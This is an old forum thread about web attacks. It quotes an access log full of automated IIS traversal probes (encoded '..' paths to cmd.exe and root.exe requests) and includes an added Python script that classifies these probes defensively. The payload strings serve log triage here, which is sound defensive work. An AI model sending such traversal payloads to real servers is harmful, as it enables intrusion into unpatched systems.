02.04.2002 |
What and where: analysed methods, how and which attacks took place on the net (by: GA, 18:53:54)
http://advice.networkice.com/advice/Intrusions/
And now some administrators' knees go weak? [ Readers: 85 ]
Re: What and where: analysed methods, how and which attacks took place on the net (by: Trap11, 21:50:46)
Here is the excerpt from a log file of a real attack (since the server runs on *** (at any rate not under Windows), the attack makes no sense, but the attackers are apparently too dumb to grasp that, because the server has been under attack for days):
192.35.240.103 - - [02/Apr/2002:04:34:08 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
192.35.240.103 - - [02/Apr/2002:04:34:15 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
193.195.130.13 - - [02/Apr/2002:04:35:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:25 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:26 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:34 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:45 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:52 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:53 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:54 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:55 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:05 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:10 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:11 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
213.229.46.2 - - [02/Apr/2002:04:44:56 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
213.229.46.2 - - [02/Apr/2002:04:44:57 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
165.121.116.141 - - [02/Apr/2002:04:48:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:39 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
210.219.219.194 - - [02/Apr/2002:04:51:04 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
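Added example, not part of the original thread and not Trap11's code: a small Python triage script that parses combined-format access-log lines like the ones quoted above, labels the probe shapes that appear in them (a root.exe check, cmd.exe reached directly through the /c and /d aliases, cmd.exe behind a double-percent-encoded "..\" or "../", and cmd.exe behind an overlong UTF-8 "/" or "\"), and summarizes per source address how many probes arrived, which shapes, and whether any probe was answered with something other than a 4xx. That last flag is the check an administrator wants: in the quoted log every probe got a 404 or 400, which is what a server without those paths should produce. The sample lines in the block are constructed (RFC 5737 documentation addresses), not copied from the post.

```python
import re

# Apache-style "combined" access log: ip ident user [ts] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Label the request path with the probe shape it matches, or None for ordinary traffic.

    The shapes are the ones visible in the quoted log: root.exe, cmd.exe reached
    directly via the /c and /d aliases, cmd.exe behind a double-percent-encoded
    separator ('..%255c', '..%%35%63', '..%25%35%63', '..%252f'), and cmd.exe
    behind an overlong UTF-8 separator ('..%c0%af', '..%c1%9c' and friends).
    """
    p = path.lower()
    if "root.exe" in p:
        return "root.exe"
    if "cmd.exe" in p:
        if re.search(r"\.\.%25", p) or "..%%35" in p:
            return "cmd.exe double-encoded traversal"
        if re.search(r"\.\.%c[01]%", p):
            return "cmd.exe overlong-utf8 traversal"
        return "cmd.exe direct"
    return None


def summarize(log_text):
    """Group probe hits per source IP: count, distinct shapes, first timestamp,
    and whether any probe was answered with a status outside 400-499."""
    per_ip = {}
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind is None:
            continue
        entry = per_ip.setdefault(
            rec["ip"],
            {"probes": 0, "kinds": set(), "first": rec["ts"], "non_4xx": False},
        )
        entry["probes"] += 1
        entry["kinds"].add(kind)
        if not 400 <= rec["status"] <= 499:
            entry["non_4xx"] = True  # a probe got through to something: look at it
    return per_ip


def report(per_ip):
    """Render the summary as text lines, busiest source first."""
    lines = []
    for ip, e in sorted(per_ip.items(), key=lambda kv: -kv[1]["probes"]):
        flag = "CHECK: non-4xx answer" if e["non_4xx"] else "all probes rejected"
        kinds = ", ".join(sorted(e["kinds"]))
        lines.append(f"{ip}: {e['probes']} probes since {e['first']} [{kinds}] -> {flag}")
    return lines


# Constructed sample (documentation addresses), shaped like the quoted log.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Apr/2002:04:34:08 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
198.51.100.7 - - [02/Apr/2002:04:35:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
198.51.100.7 - - [02/Apr/2002:04:35:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
198.51.100.7 - - [02/Apr/2002:04:35:47 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
198.51.100.7 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
198.51.100.7 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
203.0.113.9 - - [02/Apr/2002:04:36:15 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"""

if __name__ == "__main__":
    for line in report(summarize(SAMPLE_LOG)):
        print(line)
```

Run it against a real access log by feeding the file contents to summarize(); any source flagged "CHECK" answered a probe with a 2xx, 3xx or 5xx and deserves a look at what handled that path, while sources with "all probes rejected" are the background scanner noise the thread is about.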
03.04.2002 |
Re: What and where: analysed methods, how and which attacks took place on the net (by: Ronny C., 09:12:28)
Those are almost always some automatically running scripts of so-called script kiddies that try everything. I have a Domino Go Webserver running under WSeB -> I can send you megabytes of such logs. I haven't found a real solution for this silliness. At least no attack has been successful so far. :-)
I could only work around the problem by installing a firewall (actually just the "mini version" from TCP/IP 4.3) for port 80 as well. (That doesn't work, however, if you want to put a web server on the Internet -> in my case the Domino Go Webserver is only supposed to serve the intranet.) If Microsoft is the answer I want my problem back!